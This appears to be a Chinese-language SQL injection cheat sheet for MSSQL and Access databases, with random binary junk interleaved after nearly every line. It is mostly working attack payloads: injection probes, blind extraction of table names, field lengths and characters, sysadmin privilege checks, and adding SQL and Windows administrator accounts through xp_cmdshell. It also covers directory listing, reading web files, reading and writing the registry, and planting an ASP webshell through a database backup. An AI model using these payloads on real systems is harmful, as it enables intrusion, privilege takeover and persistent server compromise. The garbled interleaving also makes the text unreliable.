1.判断是否有注入;and 1=1 ;and 1=2 �?V=�CB,^�
2.初步判断是否是mssql ;and user>0 q,%��s�t�~
1Z&(6cDY8M
3.注入参数是字符'and [查询条件] and ''=' Gq P5Kx+�=
$:^td/p �J
4.搜索时没过滤参数的'and [查询条件] and '%25'=' �,#K'PB4�E
����[D1�Up
5.判断数据库系统 19] E 5'AI
!<h�)w#>en
;and (select count(*) from sysobjects)>0 mssql xyxy`�qR�A
@�(lh%@hO
;and (select count(*) from msysobjects)>0 access �7|�H$ /]
}QmqoCAE~m
{.]7!I�Sl5
�xY�B�{;K�
6.猜数据库 ;and (select Count(*) from [数据库名])>0 ;F�Eqe�4�9
�pK4)�y�u+
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 1.>m@�Slr>
ptaKf�4P^r
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 �lLIA��w$�
@}Z��Vtr�z
9.(1)猜字段的ascii值(access) �6dY�MwMH�
"Y.y:�Vv;
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 �p
K�$`$H�
(tO\)aS=�
(2)猜字段的ascii值(mssql) H��"F29Pu2
��V~ _>U}�
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 �#L�NED)Vg
_V�XN#��@y
10.测试权限结构(mssql) }�GI��t!PG
�Yr|4Fl�~U
`0R./|bv\I
o �!7va�"�
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- �d"Y�{U��E
�w2J<WC+_<
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- �6w7�7YTJ�
@j/&m]6%-D
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- f
�*)Z)6E�
�Q59W#e�)�
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- W_�ZJ0GuE(
@o.I�;}*�N
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- !_�(Tq�yg&
�W�{�aY}�`
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- A�%�-6`��>
Qwc"��[N4H
;and 1=(select IS_MEMBER('db_owner'));-- ?h��2}#wg�
�B7%U_F|�m
X�X~,>Q}H=
�ch]��29��
11.添加mssql和系统的帐户 ��w�y�G;8I
:T�q�~8!s�
;exec master.dbo.sp_addlogin username;-- [�/ZO�� q�
;exec master.dbo.sp_password null,username,password;-- �:�h�A#�m[
~)'�k 9?�0
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- Q@H�V- (A�
Y\tu�i+?�J
;exec master.dbo.xp_cmdshell 'net user username password !��&\INl-Z
tn�I�X��:6
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- g=I})s:CTp
�|cY`x(?yP
;exec master.dbo.xp_cmdshell 'net user username password /add';-- �H)&R��=s�
It�Cv.yv35
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- :Q��q���#Z
mA�}�"a<�0
��?�fS9J��
^C�%<l�(�b
12.(1)遍历目录 \��O�g+�c%
B-��ESFATc
;create table dirs(paths varchar(100), id int) c�j@k�o�A'
�D�L.!G���
;insert dirs exec master.dbo.xp_dirtree 'c:\' �'�f|��o{
3��M����=�
;and (select top 1 paths from dirs)>0 /7LR;>B��j
\�[nut��;�
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) =�Runf
�+}
��L�HmZxi?
<6=c,�y��
�� C.QO#b�
(2)遍历目录 ~�;]��d"'�
9ll~~zF99|
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- "I�TIhnE��
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 5(8@%6>ruj
Ct�|A:/�z(
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 _a�MF?Pj~m
'H!XUtFs"
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 F�g�I3 ���
����l�+0P
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 ?hM6�4jI�|
��(I}�v�[W
�s�(8W_4&'
Qei�"�'~1a
13.mssql中的存储过程 { "E\Jcjl\
R���G�X=)�
xp_regenumvalues 注册表根键, 子键 "*�H`HRi4T
h7�I{��
4�
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 �E!AE4B1bd
u]gxFG�"
�
xp_regread 根键,子键,键值名 �8i,K~Bu�=
kN�L\m[W8$
;exec xp_regread 0?M:6zf_iv
[8*�)8�jP3
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 ]cruF�#`�%
��%��%wNZ{
xp_regwrite 根键,子键, 值名, 值类型, 值 ��M@ZI���\
KG5�>]_�GH
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 ]���s�748+
]9,�;�K;1<
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 F�G�QzoS��
�v9U�D%@tZ
xp_regdeletevalue 根键,子键,值名 �:j�`s�r
~v"L!=~G;a
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 m4yL@�d,Yw
o?
$.fhD
�
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 6`-����jPR
{z�FMmPi�d
[fI�g{Q���
��7[wieYj{
14.mssql的backup创建webshell 3[f)�:
u3"
�<^uBoKB/f
use model 3�D�(0=$�W
<Ok3�F�E.K
create table cmd(str image); VD\=`r)�nT
�e0� T\tc
insert into cmd(str) values (''); A��+)`ZTuO
�2Wb]�4��-
backup database model to disk='c:\l.asp'; �F��}q�c0�
Hq �188<��
T,tdL
�N-
j8�`��BdKg
15.mssql内置函数
�YrKWA���
+2j� AC� r
;and (select @@version)>0 获得Windows的版本号 BF��<ikilR
{qMIGwu���
;and user_name()='dbo' 判断当前系统的连接用户是不是sa !?�gKqx'T$
2� ��Vrw��
;and (select user_name())>0 爆当前系统的连接用户 ��1'\/,E�s
IaXe��Rq?<
;and (select db_name())>0 得到当前连接的数据库 vZoaT|3
G]
l/awS!Q/nF
O8.5}>gDn.
i7�>tU���=
16.简洁的webshell r0gJ�pttDl
?�K\axf>�F
use model �@y&b�w9\
��t<viX'�s
create table cmd(str image); }�Z��,x~G�
IB7�E}5�6l
insert into cmd(str) values (''); #���Vha7�
Qz
N�&>sk"
backup database model to disk='g:\wwwtest\l.asp';
